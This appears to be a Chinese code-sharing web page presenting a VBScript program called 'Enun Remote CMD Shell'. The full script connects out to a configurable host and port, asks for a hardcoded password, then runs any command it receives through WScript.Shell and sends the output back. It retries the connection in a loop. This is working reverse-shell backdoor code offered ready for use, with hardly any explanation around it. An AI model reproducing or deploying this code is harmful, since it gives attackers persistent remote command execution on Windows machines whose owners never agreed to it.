VBScript Enun Remote CMD Shell代码
2014-05-09来源:易贤网

效果如图:

1.jpg

代码如下:

'============================

' Enun Remote CMDShell v 1.0

'============================

Option Explicit

CONST ACCOUNT_LOCK_TIME = 600000 '账户锁定时间,10分钟

CONST LOCKOUT_BAD_COUNT = 3 '密码失败次数

CONST DEFAULT_WAIT_TIME = 1000 '默认延时,1秒

CONST DEFAULT_TIME_OUT = 60000 '默认超时,60秒

Public WinSocket, sRevData, Count

Do

On Error Resume Next

Do While (WinSocket.State <> 7)

Dim ObjectFSO, GetConfig, Line, Host, Port, i

Set WinSocket = WScript.CreateObject("MSWinsock.Winsock")

Set ObjectFSO = CreateObject("Scripting.FileSystemObject")

Set GetConfig = ObjectFSO.OpenTextFile(".\enunrc.ini", 1)

For i = 1 To 3

Line = GetConfig.ReadLine

If InStr(Line,"Host") > 0 Then Host = Split(Line, "=", -1, 1)(1)

If InStr(Line,"Port") > 0 Then Port = Split(Line, "=", -1, 1)(1)

Next

If (Len(Host) = 0) Then Host = "127.0.0.1"

If (Len(Port) = 0) Then Port = "8090"

WinSocket.Protocol = 0

WinSocket.RemoteHost = Host

WinSocket.RemotePort = Port

WinSocket.Connect

WScript.Sleep DEFAULT_WAIT_TIME * 5

Call TrackScript(2, WinSocket.State, WinSocket.BytesReceived)

'Setp: 2

Loop

Do While (WinSocket.State <> 9 and WinSocket.State <> 0)

Dim AuthKey, LockoutBadCount, TIMEOUT_M, TIMEOUT_N

TIMEOUT_N = 0

WinSocket.SendData WinSocket.LocalHostName & " is Connected, Enter Password: "

Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)

TIMEOUT_N = TIMEOUT_N + 1000

Call ControlTimeout(TIMEOUT_N)

Loop

WinSocket.GetData Authkey, vbString

If Split(Authkey, chr(10), -1, 1)(0) = "veteran" Then

WinSocket.SendData "Logon Success, Welcome!" & vbcrlf

sRevData = "veteran"

Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)

Dim ShellObj, Executes

Set ShellObj = CreateObject("WScript.Shell")

Set Executes = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))

WinSocket.SendData Executes.StdOut.ReadAll

WinSocket.SendData Executes.StdErr.ReadAll

If (Len(sRevData) > 0) Then

TIMEOUT_M = 0

WinSocket.SendData vbcrlf & "[" & WinSocket.LocalHostName & "@enun]#: "

Else

Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)

TIMEOUT_M = TIMEOUT_M + 1000

Call ControlTimeout(TIMEOUT_M)

Loop

End If

If (LCase(Left(sRevData, 4)) = "exit") Then WinSocket.Close

WinSocket.GetData sRevData, vbString

WScript.Sleep DEFAULT_WAIT_TIME

Call TrackScript(5, WinSocket.State, WinSocket.BytesReceived)

'Setp: 5

Loop

Else

LockoutBadCount = LockoutBadCount + 1

WinSocket.SendData "Logon fail: Unknown user name or bad password." & vbcrlf

WScript.Sleep DEFAULT_WAIT_TIME

End If

If (LockoutBadCount = LOCKOUT_BAD_COUNT) Then

WinSocket.SendData "Failed too many times, the account has been locked!" & vbcrlf

WScript.Sleep DEFAULT_WAIT_TIME

WinSocket.Close

LockoutBadCount = 0

WScript.Sleep ACCOUNT_LOCK_TIME

'锁定账户

End If

Call TrackScript(3, WinSocket.State, WinSocket.BytesReceived)

'Setp: 3

Loop

Call TrackScript(1, WinSocket.State, WinSocket.BytesReceived)

'Setp: 1

Loop

'=======================

'Control Timeout.

'=======================

Public Sub ControlTimeout(Count)

If Count = DEFAULT_TIME_OUT Then

WinSocket.SendData vbcrlf & "Local server response timeout, Please reconnect ..." & vbcrlf

WScript.Sleep DEFAULT_WAIT_TIME

WinSocket.Close

'控制端60秒内无输入的话,连接自动断开,可即时连接。

Else

WScript.Sleep DEFAULT_WAIT_TIME

End If

Call TrackScript(4, WinSocket.State, WinSocket.BytesReceived)

'Setp: 4

End Sub

'=======================

'Track Script.

'=======================

Public Sub TrackScript(MyStep, StateCode, BytesReceived)

WScript.echo "MyStep: " & MyStep & ", StateCode: " & StateCode & ", Received: " & BytesReceived & " Bytes"

End Sub

更多信息请查看IT技术专栏

推荐信息